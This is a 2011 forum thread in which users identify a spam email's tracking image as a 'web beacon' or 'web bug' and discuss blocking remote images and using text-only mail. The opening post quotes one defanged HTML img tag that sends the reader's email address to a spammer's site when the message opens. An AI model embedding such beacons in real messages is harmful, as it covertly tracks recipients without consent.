Page 1 of 2

lexicon: poisoned URL? web beacon?

Posted: Mon Apr 04, 2011 6:12 pm
by NotBuyingIt
Spammers have a common and annoying habit of placing the following sort of spying code (derived from an actual case) in their email

Code: Select all

<img border="0" src="hXXp://BABBLEMENT.NET/c.asp?eid=spamee&#64;example.com">


As many will immediately recognize, the code causes the recipient's email address (e.g., spamee&#64;example.com) and IP address to be transmitted to the spammer's site (e.g., BABBLEMENT.NET) whenever the email is opened, without the recipient's knowledge or permission. The data may be profiled and used for additional spam or scams or perhaps even for identity theft. Agree?

I'm unfamiliar with the jargon. What is the best term to describe this sort of spying code? I've come across poisoned URL and web beacon, but I don't know if either term is correct. In a broader sense, it is a kind of browser exploit, I guess.

RE: lexicon: poisoned URL? web beacon?

Posted: Mon Apr 04, 2011 7:13 pm
by Swapfire
I don't think this code would work on latest thunderbird and ms outlook (at least from 2003) since both won't load outside content (images too) from first time sender without owners permission. So it's not that terrifying. Thanks for letting know anyway. I didn't have an idea this is how it's actually done.

RE: lexicon: poisoned URL? web beacon?

Posted: Mon Apr 04, 2011 9:11 pm
by siblingshot
@ NotBuyingIt

Interesting.

I knew image files could be utilized as a vehicle to transmit malicious code, but I did not know the same mechanism transmitted address and IP address back to the spammer on opening. Even in Gmail, I bar remote images from untrusted sources.

As to the defining jargon, I'd be interested to see it nailed down too.

EDIT:

:)

As for babblement.net, rated.

RE: lexicon: poisoned URL? web beacon?

Posted: Mon Apr 04, 2011 10:55 pm
by Guest
Doesn't work if email is read as text only = no HTML allowed.

and if I remember right the first e-mail client that used HTML by default was

TA-DA'
[url=http://en.wikipedia.org/wiki/Microsoft_Internet_Mail_and_News t=_self]Microsoft Internet Mail and News[/url]

I always setup up my e-mail clients to send and revieve message as text only

RE: lexicon: poisoned URL? web beacon?

Posted: Mon Apr 04, 2011 11:02 pm
by c۞g
http://en.wikipedia.org/wiki/Web_bug

Doesn't work if email is read as text only = no HTML allowed.

[edit]
babblement.net
redirects to:
unsubyourself.net

RE:e-mail clients

Posted: Mon Apr 04, 2011 11:04 pm
by c۞g
I use gmail
and have it configured not to display images

RE: lexicon: poisoned URL? web beacon?

Posted: Mon Apr 04, 2011 11:18 pm
by MysteryFCM
Correct term = beacon

RE: lexicon: poisoned URL? web beacon?

Posted: Mon Apr 04, 2011 11:58 pm
by NotBuyingIt
Much thanks!

RE: lexicon: poisoned URL? web beacon?

Posted: Tue Apr 05, 2011 12:13 am
by NotBuyingIt
After reading all of the relies to my question, I came across this:

http://en.wikipedia.org/wiki/Web_beacon

Thanks to all.

lexicon: off topic

Posted: Tue Apr 05, 2011 1:49 am
by c۞g
off topic; apologies

Lexicon - "specific dictionary"

would make an interesting Wiki contribution; WOT Lexicon (dictionary) related to WOt and it's functions, including security aspects.
Anyone willing and able?